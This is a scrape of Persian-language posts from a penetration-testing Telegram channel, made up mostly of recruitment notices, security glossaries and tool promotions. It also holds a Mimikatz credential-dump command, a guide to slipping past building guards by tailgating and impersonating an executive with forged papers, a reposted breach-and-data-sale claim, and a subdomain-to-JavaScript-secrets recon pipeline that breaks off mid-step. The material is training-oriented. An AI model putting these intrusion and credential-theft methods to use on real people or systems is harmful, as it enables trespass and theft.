Try Hack Box

🔖 استفاده از هوش مصنوعی برای انجام وظایف به بخش های روزمره کاری در بسیاری از صنایع تبدیل شده است، که نیاز به سخت افزارهای هوش مصنوعی درجه سرور و درجه مصرف کننده برای پاسخگویی به تقاضا را ایجاد کرده است ...

✍ تهیه شده توسط : تیم ترجمه TryHackBox

#Ai #AiPC
@TryHackBox

⭕ فرصت آخر برای دوستانی که مایل هستند به تیم ما اضافه شوند .


🔸 عضویت در تیم ابزارنویسی و توسعه ابزارهای حوزه تست نفوذ ( پذیرش محدود ) .
▫️( ابزارهای هم پرایوت هست که فقط اعضای تیم و دوستانی که با ما همکاری میکنند میتوانند استفاده کنند . )

🔹 عضویت در تیم ترجمه ما از قبیل ( ترجمه مقالات ، اخبار ، کتاب های این حوزه ) .
▫️(دوستانی که در ترجمه کتاب ها و مقالات اسم شما ثبت می شود و یک نسخه چاپی کتاب به شما داده می شود رایگان ، و مزایای دیگه )

♦️ عضویت در تیم تدریس ما که شامل دوره هایی که ذکر میشه .
▫️ (در اینجا ما منابع مناسب و تجربه لازم رو در حوزه ای که تجربه داریم رو در اختیارتون میزاریم تا پیشرفت کنید و مزایای دیگر که بهتون گفته میشه ) .

▫️ جذب ادمین برای گذاشتن پست در شبکه های اجتماعی .
این دسته از عزیزان هم مزایایی هست واسشون که بهشون گفته می شود .

▫️ عضویت در تیم پادکست ما برای ظبط پادکست های حوزه تست نفوذ و امنیت .
(مزایای مناسب برای شما عزیزان )

💢 این فرصت آخر هست اگر مایل هستید به تیم ما بپیوندید اقدام کنید ، ما از اعضای فعال و با استعداد حمایت میکنیم ، در کنار ما مزایایی شامل حال شما می شود که به پیشرفت شما دوستان کمک میکند .

⭕ فرصت عضویت محدود این فرصت از دست ندید .

💠 جهت ارتباط :
🔶️ @Unique_exploitbot

🔖 سازندگان نرم‌افزارهای مدرن با تهدیدات سایبری بی‌شماری روبرو هستند که constantly در حال تغییر و تحول هستند. پیچیدگی میکروسرویس‌های توزیع‌شده، استقرار در ابر و تیم‌های غیرمتمرکز نیازمند شیوه‌های امنیتی قوی در طول فرآیند توسعه و استقرار نرم‌افزار است. دو استراتژی کلیدی...

ASPM (Application Security Posture Management) :

به معنای مدیریت وضعیت امنیتی برنامه‌ها است. این مفهوم به سازمان‌ها کمک می‌کند تا وضعیت امنیتی کلی برنامه‌های خود را ارزیابی و بهبود بخشند.

ASOC (Application Security Operations Center) :

به معنای مرکز عملیات امنیت برنامه‌های کاربردی است. این مرکز به طور خاص بر روی امنیت برنامه‌های نرم‌افزاری و شناسایی آسیب‌پذیری‌ها در طول چرخه توسعه نرم‌افزار (SDLC) تمرکز دارد.

✍ تهیه شده توسط : تیم ترجمه TryHackBox

#ASOC #ASPM
@TryHackBox

دوستان قصد داریم یک تیم در خصوص توسعه و نوشتن ابزارهای تست نفوذ ایجاد کنیم و ابزارهایی را توسعه و بنویسم اگر مهارت برنامه نویسی خوبی دارید میتوانید به تیم ما اضافه بشید :
جهت ارتباط :
@Unique_exploitbot

دوستان درحال کامل کردن یک پست برای میمکتز هستم ممکنه کمی طول بکشه حتما تموم کنم نشر میدم بهتون که امیدوارم مفید واقع بشه واستون لطفا صبر کنید .

فعلا یکسری اصطلاح امنیت سایبری برای شما قرار میدیم که بخونید مروری بشه یا یاد بگیرید .

ممنون از صبوری شما .

🔖 اصطلاح "Zero-Day" زمانی استفاده می‌شود که تیم‌های امنیتی از آسیب‌پذیری نرم‌افزار خود بی‌اطلاع باشند و "0" روز فرصت داشته باشند تا روی یک پچ امنیتی یا به‌روزرسانی برای رفع مشکل کار کنند. این اصطلاح معمولاً با مفاهیم آسیب‌پذیری، اکسپلویت و تهدید ... .

✍ تهیه شده توسط : تیم ترجمه TryHackBox

#ZeroDay
@TryHackBox

درود دوستان قرار هست یکسری مقالات ترجمه کنیم در زمینه امنیت سایبری اگر مایل به کمک بودید به ما پیام دهید :
@Unique_exploitbot

لینک گروه جدید ما :
https://t.me/+XPV3S0tygl1lZGE0

Credential (اعتبارنامه) چیست؟

به اطلاعاتی گفته می‌شود که برای اثبات هویت (Authentication) یک کاربر یا سیستم استفاده می‌شوند. این اطلاعات معمولاً شامل ترکیبی از نام کاربری (Username) و رمز عبور (Password) یا سایر روش‌های احراز هویت مانند توکن‌ها، کلیدهای رمزنگاری یا بیومتریک (مانند اثر انگشت یا تشخیص چهره) هستند.

انواع Credential

1. نام کاربری و رمز عبور:

   - رایج‌ترین نوع Credential که شامل یک نام کاربری و رمز عبور مرتبط با آن است.

   - مثال: Username: admin, Password: P@ssw0rd.

2. هش‌های رمز عبور:
   - در سیستم‌عامل‌هایی مانند ویندوز، رمزهای عبور به صورت هش‌شده (مثلاً NTLM یا SHA1) ذخیره می‌شوند.
   - مثال: NTLM Hash: 1234567890ABCDEF1234567890ABCDEF.

3. توکن‌های دسترسی (Access Tokens):

   - توکن‌هایی که پس از احراز هویت موفق ایجاد می‌شوند و برای دسترسی به منابع سیستم استفاده می‌شوند.

4. کلیدهای رمزنگاری:
   - کلیدهای عمومی و خصوصی که برای احراز هویت و رمزنگاری استفاده می‌شوند.

   - مثال: کلیدهای SSH یا کلیدهای مورد استفاده در پروتکل TLS.

5. بیومتریک:
   - اطلاعات بیومتریک مانند اثر انگشت، تشخیص چهره یا اسکن عنبیه.

کاربرد Credential
- ورود به سیستم: برای دسترسی به سیستم‌عامل، برنامه‌ها یا سرویس‌های آنلاین.

- دسترسی به شبکه: برای اتصال به شبکه‌های محلی یا اینترنت.

- احراز هویت دو مرحله‌ای (2FA): استفاده از Credential دوم (مانند کد ارسال‌شده به موبایل) برای افزایش امنیت.

- دسترسی به منابع اشتراکی: مانند فایل‌ها، پایگاه‌های داده یا سرویس‌های ابری.

ذخیره‌سازی Credential

- در حافظه سیستم: Credential ها ممکن است در حافظه پروسس هایی مانند LSASS (در ویندوز) ذخیره شوند.

- در پایگاه‌های داده: سیستم‌های مدیریت هویت (مانند Active Directory) Credential ها را در پایگاه‌های داده ذخیره می‌کنند.

- در فایل‌ها: برخی برنامه‌ها Credential ها را در فایل‌های پیکربندی یا رمزنگاری‌شده ذخیره می‌کنند.


خطرات مرتبط با Credential

1. سرقت Credential:
   - مهاجمان می‌توانند با استفاده از ابزارهایی مانند Mimikatz، Credential ها را از حافظه سیستم استخراج کنند.

   - مثال: استفاده از دستور `sekurlsa::logonpasswords` در Mimikatz.

2. حمله Brute Force:
   - تلاش برای حدس زدن رمز عبور با استفاده از روش‌های brute force یا dictionary attack.

3. فیشینگ:
   - فریب کاربران برای افشای Credential های خود از طریق صفحات جعلی یا ایمیل‌های فیشینگ.

4. استفاده مجدد از Credential:
   - استفاده از یک Credential سرقت‌شده برای دسترسی به چندین سیستم یا سرویس.


راه‌های محافظت از Credential
1. استفاده از رمزهای عبور قوی:
   - رمزهای عبور باید طولانی، پیچیده و منحصر به فرد باشند.

2. فعال‌سازی احراز هویت دو مرحله‌ای (2FA):
   - اضافه کردن لایه امنیتی دوم برای جلوگیری از دسترسی غیرمجاز.

3. مدیریت Credential ها:
   - استفاده از ابزارهای مدیریت رمز عبور (Password Manager) برای ذخیره‌سازی امن Credential ها.

4. به‌روزرسانی سیستم‌عامل و نرم‌افزارها:
   - نصب آخرین وصله‌های امنیتی برای جلوگیری از سوءاستفاده از آسیب‌پذیری‌ها.

5. آموزش کاربران:
   - افزایش آگاهی کاربران درباره خطرات فیشینگ و اهمیت محافظت از Credential ها.

نتیجه‌گیری
Credential ها
نقش حیاتی در امنیت سیستم‌ها و شبکه‌ها دارند. محافظت از آن‌ها در برابر سرقت و سوءاستفاده یکی از مهم‌ترین اقدامات امنیتی است. با رعایت بهترین روش‌های امنیتی، می‌توان از Credential ها به طور مؤثر محافظت کرد.
#Credential
@TryHackBox

دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :

@Unique_exploitbot

Active Directiry , Kerberos , LDAP , Group Policy , IIS , DNS , DHCP , file server

دوستان میخواستم یک دوره راجب این سرویس ها داشته باشیم ولی چون فعلا کسی توانایی انجام و رکورد یا بهتره بگیم وقتشو نداره اینم بعد از میمیکتز حتما توی فایل pdf آماده میکنم میزارم واستون .

دوستان ما برای تکمیل تیم خود از شما دعوت میکنیم به جمع ما بپیوندید .

1 . جذب مدرس برای برگزاری دوره های مختلف مثل شبکه ، لینوکس ، امنیت دفاعی و تهاجمی .

2 . عضویت در تیم ترجمه ما در خصوص کتاب ها و مقالات مختلف امنیت سایبری

3. کسانی که علاقه مند به ایجاد پادکست هستند ،از جمله پادکست های مختلف این حوزه


راه ارتباطی با ما :

@Unique_exploitbot

میمیکتز یکی از پرکاربردترین این ابزارهاست که اولین‌بار توسط یک برنامه‌نویس فرانسوی به نام Benjamin DELPY توسعه داده شد. این ابزار امکان دستکاری مستقیم object و پروسس ها و اجرای آن‌ها را از طریق تکنیک‌های مختلف فراهم می‌کند. میمیکتز به طور گسترده‌ای برای دور زدن مکانیزم‌های امنیتی، از جمله نرم‌افزارهای EDR (Endpoint Detection and Response و ابزارهای آنتی‌ویروس استفاده می‌شود. این ابزار دارای ویژگی‌هایی است که برای تست نفوذ و exploitation طراحی شده‌اند.

○ پروژه‌های مرتبط با میمیکتز:

■ _kekeo : Kerberos attack tool (mimlib)
■ mimidrive

○ حملات پشتیبانی شده:

■ Pass-the-Hash
■ LSASS Mini Dump
■ Pass-the-Hash (over)
■ Kerberos
■ Zero Logon
■ TGT Generation
■ Pass-the-Ticket
■ Golden Ticket
■ Silver Ticket
■ DC Sync
■ DC Shadow
■ _kekeo

میمیکتز از تکنیک‌های متنوعی برای اجرا استفاده می‌کند، از جمله برخی از آن‌ها که در متااسپلویت یافت می‌شود. همچنین با ابزارهایی مانند "Kiwi" برای عملیات‌های پیشرفته سازگار است.

منبع
https://github.com/9STsu/Mimikatz-AllTheThings
اگر موافق هستید به زبان فارسی بزاریم توی کامنت ها اعلام کنید .
@TryHackBox

🔖 بیش از 100 نکته برای Bug Bounty جمع‌آوری شده از X .

#BugBounty #bugbountytips

@TryHackBox

داستان واقعی... هکر Pompompurin

• BreachForums به عنوان بزرگ‌ترین انجمن هکری در زمینه نشت داده‌ها شناخته می‌شد و این انجمن توسط هکرها و باج‌گیرها برای «نشت» اطلاعات استفاده می‌شد. کنور برایان فیتزپاتریک (Pompompurin) مالک و بنیان‌گذار این سایت بود.

• در بهار سال ۲۰۲۳، این انجمن توسط مقامات قانونی تعطیل شد و Pompompurin که ۲۰ سال داشت، دستگیر شد. بعداً مقامات اعلام کردند که توانسته‌اند به پایگاه داده این سایت دسترسی پیدا کنند و در ژوئن، دامنه‌های BreachForums و سایت شخصی Fitzpatrick مصادره شدند.

• ما یک مقاله کوتاه را ترجمه کرده‌ایم که شامل تاریخچه شکل‌گیری BreachForums و توضیح روش‌های مختلف OSINT است که مقامات قانونی برای پیدا کردن مدیر سایت و دیگر اطلاعات از آن‌ها استفاده کردند...

مطالعه

@TryHackBoxStory

دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :

@Unique_exploitbot

هرکس توانایی و صدای خوبی داره برای رکورد پادکست ها ، مطلب بهتون میدیم با ما در ارتباط باشه تا داستان ها و مطالب و .. پادکست درست کنیم

برای سرعت بخشیدن به یادگیری شما عزیزان

دوستان ما میخواهیم دوره های رایگان دیگه ای رو از جمله :
Python For Pentester
Powershell For Pentester
Linux for Hackers
SEC504 / SEC560 / SEC542 / OWASP TOP 10 / Mitre Att&ck
CCNA / CCNP / Mikrotik / Lpic1,2 / Bash Scripting

قرار بدیم البته اگر دوره ای مدنظرتون هست خودتون همون دوره رو استارت بزنید .

مزایا :
ما میتوانیم شما را به شرکت هایی که در ارتباطیم معرفی کنیم و مشغول به کار بشید .
اگر هم در مسیر یادگیری ردتیم و تست نفوذ شبکه هستید و وب به شما میتوانیم کمک کنیم پیشرفت کنید .

در کنار این کار ما یک تیم ترجمه هم داریم که کتابهای مختلف این حوزه رو ترجمه میکنیم اگر دوست داشتید به تیم ما اضافه شید پیام دهید .

این فرصت از دست ندید!
@Unique_exploitbot

🔖 مروری بر پست های کانال

👨‍💻 پرینتر هکینگ 101

🧑‍💻 اصول اولیه PowerShell و PowerShell Scripting را بیاموزید

🧑‍💻 مقدمه ای بر امنیت سایبری

🧑‍💻 نقشه راه تست نفوذ شبکه

🧑‍💻 مهندسی اجتماعی: چطور نگهبان رو دور بزنیم؟

🧑‍💻 استاندارها و فریم ورک های سایبر

🧑‍💻 چگونه و از کجا وارد دنیای هک و امنیت بشیم ؟

🧑‍💻 دوره رایگان سکوریتی پلاس

🧑‍💻 دوره رایگان Network+

🧑‍💻 10 تا از بهترین ابزارهای رایگان OSINT برای جستجوی افراد در سال 2025

🧑‍💻 مینی دوره رایگان Linux command-line

🧑‍💻 اوسینت برای تمرینات تیم قرمز - قسمت اول


🔶 برای آموزش های بیشتر همراه ما باشید .
➖➖➖➖➖
🆔 @TryHackBox
➖➖➖➖➖

🔖 اوسینت برای تمرینات تیم قرمز - قسمت اول

#OSINT
@TryHackBox
@TryHackBoxOfficial

درود خدمت دوستان گرامی

دوستان اگر کسی هست یک مینی دوره رکورد کنه در مورد MCSA/MCSE سرویس های ( Active Directiry , Kerberos , LDAP , Group Policy , IIS , DNS , DHCP , file server , Wsus) با ما در ارتباط باشد :

@Unique_exploitbot

💬 این کد چه مشکلی دارد؟ مستعد چه باگ بانتی است؟ پاسخ های خود را در کامنت بنویسید👇

@TryHackBox
@TryHackBoxOfficial

🔥آیین سالروز درگذشت اشوزرتشت در شهرهای زرتشتی نشین🔥

🔥زرتشتیان در شهرها، روستاها و محله های زرتشتی نشین ایران، در روز پنجم دی ماه، آیین سالروز درگذشت اشوزرتشت اسپنتمان را برگزار می کنند...🔥

درود خدمت تمامی دوستان عزیز ، دوستان تا الان هر انتقادی و پیشنهادی دارید نسبت به کانال بگید به ما ..
بنظرتون آیا کانال نسبت به قبل فرقی کرده؟

چگونه و از کجا هک را شروع کنیم ؟

https://www.instagram.com/p/DD9Q3fTohCy/?igsh=Zzlyc25yNmp0b3p0

@TryHackBox

خبرهای هیجان‌انگیزی در راه است! ما قصد داریم با افراد برجسته‌ حوزه امنیت سایبری، لایوهای جذاب و پرمحتوایی برگزار کنیم.  شما می‌توانید سوالات خود را بپرسید و پاسخ‌های خود را از این کارشناسان دریافت کنید!

اما برای اینکه این رویدادها به بهترین شکل ممکن برگزار شوند، به حمایت شما نیاز داریم. کانال یوتیوب ما به این دلیل که تازه راه اندازی شده تعداد کاربرانی که دنبال میکنند ما را کم هست تعداد افراد کانال تلگرام ما نزدیک به ۴ هزار نفر هست و هر کدومتون یه یوتیوب تو گوشی‌تون دارین یا می‌تونین به راحتی وارد سایت بشید ، پس لطفا ما را دنبال کنید!

از شما خواهش می‌کنم با یک کلیک ساده، کانال یوتیوب را دنبال کنید.با اینکار ، ما یک قدم به برگزاری این لایوهای فوق‌العاده نزدیک‌تر می‌شویم. اجازه بدید با هم با این بزرگواران مصاحبه‌های جذابی داشته باشیم!

با تشکر از همگی شما!

کانال یوتیوب ما :
https://youtube.com/@tryhackbox

در پیرو پیام مدیر اگر کسی هم حتی مبتدی هست ولی فن بیان خوبی داره حتما پیام بده بهمون البته اگه علاقه مند به تدریس هست ، برای یکسری فیلمای کوتاه میخواییم ..

برای سرعت بخشیدن به یادگیری شما عزیزان

دوستان ما میخواهیم دوره های رایگان دیگه ای رو از جمله :
Python For Pentester
Powershell For Pentester
Linux for Hackers
SEC504 / SEC560 / SEC542 / OWASP TOP 10 / Mitre Att&ck
CCNA / CCNP / Mikrotik

قرار بدیم البته اگر دوره ای مدنظرتون هست خودتون همون دوره رو استارت بزنید .

مزایا :
ما میتوانیم شما را به شرکت هایی که در ارتباطیم معرفی کنیم و مشغول به کار بشید .
اگر هم در مسیر یادگیری ردتیم و تست نفوذ شبکه هستید و وب به شما میتوانیم کمک کنیم پیشرفت کنید .
این فرصت از دست ندید!
@Unique_exploitbot

دوستان صفحه لینکدین ما ایجاد شد
مارا دنبال کنید :
https://www.linkedin.com/company/tryhackbox/

دوستان نکاتی راجب هدف داشتیم اگر خواستید میتونید جوین شید بخونید تا پاک نکردم
@TryHackBoxOfficial

اینجا میدونید که بحث گذاشتن رودمپ های مختلف هست که شما شروع کنید ولی خب ممکنه در این بین از مسیر لذت نبرید یا به هر دلیل اهمال کاری کنید و موارد دیگه ، سعی میکنیم اینجا به شما کمک کنیم به هدفتون برسید و حوزه ای که دوست دارید رو یاد بگیرید ..

شب چله همگی خجسته🍷🍷

در مناسبت شب چله، یا همانطور که در دوره ساسانی به آن گفته میشد «زایش مِهر»، به یاد ایزد مِهر، که خود پیمان مقدس است، که تابش خورشیدی است که انسان را به فرّ و خورشید، به وسپار اورمزد، و تمامی مردمان خوب را به هم متصل میکند، باشد که خجسته باشی، چله مبارک!

@TryHackBox

https://cyberscoop.com/international-crackdown-disrupts-ddos-for-hire-operations/

reverse shell چیست ؟

یک گروه هکری با نام "احدوت" به تازگی به زیرساخت‌های نظامی و حساس کشور نفوذ کرده است. این گروه در بیانیه‌ای که منتشر کرده، به جزئیات دسترسی‌های خود و اهداف حملاتشان اشاره کرده‌اند.

گروه "احدوت" به طور خاص به دنبال نفوذ به تمامی زیرساخت‌های دولتی و نظامی در سطح جهانی است. در اولین اقدام رسانه‌ای خود، یکی از اعضای این گروه با نام مستعار "دارک‌وب95" توانسته است از طریق گسترش یکی از ابزارهای تولیدی‌شان در دیتاسنتر سازمان حفاظت اطلاعات نیروی انتظامی، حجم زیادی از داده‌ها را جمع‌آوری کند. این اطلاعات اکنون در حال تمیزسازی و دسته‌بندی است.

این گروه همچنین اعلام کرده که تعدادی از نمونه‌های اطلاعاتی را به اشتراک گذاشته و جزئیات بیشتری را ارائه خواهد داد.

▎دسته اول:

این داده‌ها شامل اطلاعات تخصصی مربوط به سازمان فراجا است. این اطلاعات شامل تعداد زیادی فایل‌های شنود مکالمات تلفن همراه و پیامک‌ها به صورت انبوه و بدون دسته‌بندی (از طریق اسنیف شبکه) و همچنین مکاتبات اداری و کدهای ناقص دو سامانه سازمانی هستند. علاوه بر این، اطلاعات مربوط به لاگ فعالیت کارکنان سازمان در یک بازه زمانی مشخص و اطلاعات شبکه منابع پنهان سازمان نیز در این دسته قرار دارد. همچنین، کمتر از ۱۰ میلیون تصویر چهره بیومتریک و بانک اطلاعات کارکنان و بازنشستگان سازمان حفاظت اطلاعات نیروی انتظامی نیز جمع‌آوری شده است. به درخواست عامل نفوذی، این اطلاعات نباید در اختیار سازمان قرار گیرد و امکان شناسایی افراد در سطح دارک وب و تلگرام وجود ندارد. بنابراین، تصمیم گرفته شده که این اطلاعات تنها در ازای پرداخت وجه به سرویس‌های اطلاعاتی منطقه‌ای ارائه شود. فرآیند فروش این اطلاعات به این صورت است که پس از برقراری ارتباط اولیه در تلگرام، فرد باید هویت سازمانی خود را مشخص کند و آدرس وب‌سایت رسمی و ایمیل سازمانی را ارائه دهد. پس از تأیید هویت، سمپل‌های اطلاعات ارسال خواهد شد. اگر امکان ارتباط با یک دستگاه امنیتی خارجی وجود داشته باشد، مبلغ ویژه‌ای دریافت می‌شود.

پس از توضیحات مربوط به دسته اول، این گروه اقدام به افشای نمونه‌هایی از کارکنان سازمان حفاظت اطلاعات نیروی انتظامی کرده است.

▎دسته دوم:

این دسته شامل خروجی بانک‌های اطلاعاتی و استعلامی سازمان است. به دلیل ملاحظات امنیتی، حجم دقیق رکوردهای این داده‌ها قابل ذکر نیست. این اطلاعات شامل ۹ بانک اطلاعاتی بزرگ کشوری است که سه بانک مرتبط با سفرهای خارجی در قالب یک وب‌سرویس به یک مجموعه مسافرتی ارائه شده و تا اطلاع ثانوی قابلیت فروش ندارند. سایر بانک‌ها برای فروش به افراد مختلف در دسترس هستند.

نمونه‌هایی که افشا شده‌اند شامل موارد زیر است:

• بانک مجرمین و متخلفین (۲ میلیون رکورد)

• بانک اطلاعات موتور سیکلت (۱۱ میلیون رکورد)

• بانک اقامت هتل (۱۰ میلیون رکورد)

• بانک اماکن و مراکز (۵ میلیون رکورد)

• بانک پلاک خودرو ایران (۶۰ میلیون رکورد)

• بانک گواهینامه کشور (۳۰ میلیون رکورد)

این افشاگری‌ها نگرانی‌های جدی درباره امنیت اطلاعات و زیرساخت‌های کشور ایجاد کرده است.

@TryHackBox

🏃‍♂️ آموزش های رایگان امنیت شبکه و تست نفوذ
✅ مقالات حوزه امنیت شبکه و تست نفوذ
🔴 پکیج های آموزشی
✔️ چالش های امنیت سایبری
🔰 به همراه فیلم های آموزشی رایگان

https://t.me/irsecurityworld

مهندسی اجتماعی: چطور نگهبان رو دور بزنیم؟

🌟 متدهای ساده برای عبور از سد ها

درود دوستان! 
اگه به نفوذ فیزیکی علاقه دارید، حتماً با موقعیتی مواجه شدید که باید وارد ساختمونی بشید که نگهبانی سر راهتونه. حالا باید چیکار کنیم؟ زور و درگیری؟ نه! قراره از روش‌های زیرکانه استفاده کنیم. 

🔍 اول: شناخت نگهبان 
بیشتر نگهبان‌ها آدم‌هایی هستن که از کارشون احساس قدرت می‌گیرن. ممکنه حواسشون پرت باشه یا سرگرم تلویزیون و روزنامه. اگه با این دیدگاه جلو برید، احتمال موفقیتتون بیشتر میشه.

---

🎯 روش ۱: اتاق سیگار
تو اکثر ادارات، یه اتاق سیگار هست که کارمندا برای استراحت میرن اونجا. 
چی کار کنیم؟ 
1. دوستانه وارد بحث بشید و اعتمادشون رو جلب کنید. 
2. اگه پاس یا کارتی دستشونه، می‌تونید با کمی دقت و زیرکی اطلاعات لازم رو جمع کنید یا حتی از کارت کپی بگیرید. 
3. یا از احساساتشون استفاده کنید و با خواهش و تمنا بگید که مجوز ندارید و کمک بخواید.

---

🎯 روش ۲: ازدحام
این روش مخصوص جاهای شلوغه. 
1. یه نفر که خیلی اعتماد به نفس نداره یا ظاهراً ضعیف به نظر میاد رو پیدا کنید. 
2. پشت سرش قرار بگیرید و وقتی کارت یا پاسش رو نشون داد، شما هم باهاش وارد شید. 
3. حواستون باشه سریع توی جمعیت گم بشید که کسی متوجه نشه.

---
👍 روش سوم: سوال مهم
قبل از شروع، باید حسابی آماده باشید. باید بفهمید چه کسانی در شرکت هستند، چه مدارکی حمل می‌کنند، و در صورت بروز مشکل با چه کسی باید صحبت کنید. در این روش، باید خیلی جدی و رسمی رفتار کنید. چطور؟
رسمی‌ترین لباس‌ها رو می‌پوشید، مثلاً کت و شلوار. مهم اینه که خیلی ساده و شیک به نظر برسید.
سریع و با اعتماد به نفس به سمت گِیت نگهبانی  حرکت کنید. نگهبان‌ها ممکنه شما رو متوقف کنند. اگر اینطور شد، با جدیت و بدون مکث می‌گید: "من الکساندر کروتوی هستم، نماینده/مدیر کل شرکت [اسم شرکت]."

یک سند از پیش آماده شده نشون می‌دید که حاوی اطلاعات رسمی هست. به این ترتیب، نگهبان‌ها مجاب می‌شن که شما برای ورود به اونجا اجازه دارید.

⚠️ نکات پایانی:
اعتماد به نفس: مهمترین عامل موفقیت این استراتژی، اعتماد به نفس شماست.
اوسینت (جمع‌آوری اطلاعات عمومی): با تحقیق دقیق، می‌تونید بفهمید که چه کسی مسئول چی هست و نقاط ضعف سیستم‌های امنیتی رو شناسایی کنید.
هیچ چیزی رو دست کم نگیرین: سعی کنید همیشه گزینه‌های مختلف رو بررسی کنید و از تخیل خود استفاده کنید. هدف شما پیدا کردن آسیب‌پذیری‌هاست، نه فقط عبور از در.
مهمترین آسیب‌پذیری، خود فرد است: بیشتر از هر چیز، تعاملات انسانی و آسیب‌پذیری‌های فردی رو هدف قرار بدید.

❗️ توجه: ورود غیرقانونی به هر ساختمان یا سازمانی می‌تواند پیامدهای قانونی داشته باشد. این روش‌ها فقط برای مطالعه و آگاهی است و نویسنده هیچ مسئولیتی در قبال اقدامات غیرقانونی ندارد.
🚀 موفق باشید!

✅ نکته مهم: 
این متدها فقط چارچوب‌های کلی هستن. خلاقیت شما در لحظه تعیین‌کننده است. مهم اینه که خودتون رو خونسرد نشون بدید و سناریو رو طبیعی اجرا کنید.

💡 پیشنهاد شما چیه؟ 
اگه ایده‌های جالبی دارید، توی کامنت‌ها با ما به اشتراک بذارید!
#SE #مهندسی_اجتماعی
📰 @TryHackBox
🗞 @TryHackBoxOfficial
📃 @TryHackBoxStory

درود خدمت شما عزیزان گرامی

مطمئنا تبادلات شما رو خسته کرده البته خودمونم خسته میشیم و حوصله تبادل نداریم ولی خب این تبادلات نیاز هست که دانشی که به اشتراک میگذاریم چه در تلگرام چه در یوتیوب و چه اینستا و ... دیده بشه و افراد بیشتری استفاده لازم رو از اون علم ببرند از شما عزیزان خواهشمندم که صبور باشید و از تبادلات ما آزرده خاطر نشید .

درود به همه عزیزان!

امروز به دنبال یک ادمین با استعداد و با انگیزه هستم که دارای سطح علمی مناسب باشد و با مفاهیم امنیت سایبری آشنایی کافی داشته باشد. اگر شما فردی هستید که می‌توانید به راحتی اطلاعات را به اشتراک بگذارید و فن بیان قوی دارید، ما به شدت به مشارکت شما احتیاج داریم!

من تمامی محتواها را آماده می‌کنم؛ شما تنها کافیست آنها را ضبط کرده و در یوتیوب منتشر کنید. این یک فرصت عالی برای یادگیری و رشد در این حوزه است.

اگر احساس می‌کنید که شرایط مورد نظر را دارید و می‌خواهید بخشی از یک تیم موفق باشید، لطفاً به من پیام دهید!
منتظر پیام‌های شما هستم!
لطفا اگر دوستانی را میشناسید که علاقه مند هستند به تدریس  یا پست گذاشتند این پیام را برای آنها ارسال کنید با تشکر .

رزومه خودتون ارسال کنید برای ما :

@Unique_exploitbot

تیم آموزشی گوت سک در تلاش است تا در مسیر قرمز همراه دوستان عزیز باشد تا منابع کافی و الزامات مورد نیاز را فراهم کند تا مسیر را به بهترین شکل ممکن بتوانید طی کنید

همچنین فارغ از کتابهای مورد نیاز ، و ترجمه مقالات مورد نیاز در حوزه های وب ، تست نفوذ سخت افزار ، اندروید به ساخت پادکست با متخصصین مختلف امنیتی برگزار نماید و همچنین ویس چت های راهنمایی برای تعامل متخصصان با کاربران عادی جهت مسیریابی


به ما بپیوندید در این مسیر

-> @goat_sec

⚒️ SigmaPotato
- ابزار افزایش دسترسی SeIpersonate برای Windows 8-11 و Windows Server 2012-2022 با پشتیبانی پیشرفته از PowerShell و بازتاب .NET

👉 GitHub
#redteam #tools
@TryHackBox

🥷 IDOR :
راهنمای کامل برای بهره برداری از آسیب پذیری های پیچیده IDOR

با کمک این راهنما، یاد می گیرید که IDOR های ساده و پیچیده را شناسایی و کار کنید.

بخوانید


#guide #pentest #bugbounty@TryHackBox

@TryHackBox

🔖  تیم PortSwigger ابزار SignSaboteur را معرفی کرده است که با آن می توانید به راحتی توکن های وب امضا شده را جعل کنید.

توکن های وب امضا شده به طور گسترده برای احراز هویت و مجوز stateless در وب استفاده می شوند. محبوب‌ترین فرمت JSON است، اما فراتر از آن، اکوسیستم استانداردهای پر رونقی وجود دارد که هرکدام دارای پیاده‌سازی خاص خود از ذخیره‌سازی داده و امنیت هستند.

ابزار جدید برای کمک به ارزیابی آنها طراحی شده است. این طراحی شده است تا حملات ذکر شده را خودکار کند و تضمین کند که دیگر پیکربندی های ناامن را از دست ندهید.

اطلاعیه
https://portswigger.net/research/introducing-signsaboteur-forge-signed-web-tokens-with-ease

#pentest #tools
@TryHackBox

⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️

💠 تست نفوذ را رایگان یاد بگیر .
⭕️ @TryHackBox

📖 کتاب ها و منابع Cyber Security
📚 @LibrarySecOfficial

💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ...
⭕️ @TryHackBoxOfficial

💠 تمامی منابع و ابزار های SOC ,DFIR , THIR

⭕️ @hypersec

💠 منابع BlueTeam :
⭕️ @BlueTeamKit

💠 ابزارها و دوره های OSINT
⭕️ @OsintGit

💠 برگزاری دوره های امنیت سایبری
⭕ @kasraone_com

💠 تمامی منابع Red Team اینجاست!
💠 آموزش توسعه بدافزار (رایگان)
⭕ @RedTeamVillageRTV

💠 منابع CTF و رایت آپ ها و دوره های HackTheBox  :
⭕ @PfkCTF

💠پنتست وب رو یاد بگیر
⭕️ @GitBook_s

💠 برای اضافه شدن در لیست پیام دهید :
🤖 @Unique_exploitbot

⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️

کانال یوتیوب ما :
فعالیت به زودی ...
ما را در یوتیوب دنبال کنید

https://youtube.com/@tryhackbox

🔖 تشخیص JavaScript Secret Automated

1 - دامین های زنده را جمع آوری کنید

docker run -v $(pwd):/src projectdiscovery/subfinder:latest -dL /src/domains -silent -o /src/subdomains
docker run -v $(pwd):/src projectdiscovery/dnsx:latest -l /src/subdomains -t 500 -retry 5 -silent -o /src/dnsx
docker run -v $(pwd):/src projectdiscovery/naabu:latest -l /src/dnsx -tp 1000 -ec -c 100 -rate 5000 -o /src/alive_ports
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/alive_ports -t 100 -rl 500 -o /src/alive_http_services

2 - جمع آوری فایل های JS برای تجزیه و تحلیل

docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links

3 - جستجوی secrets در فایل های JS

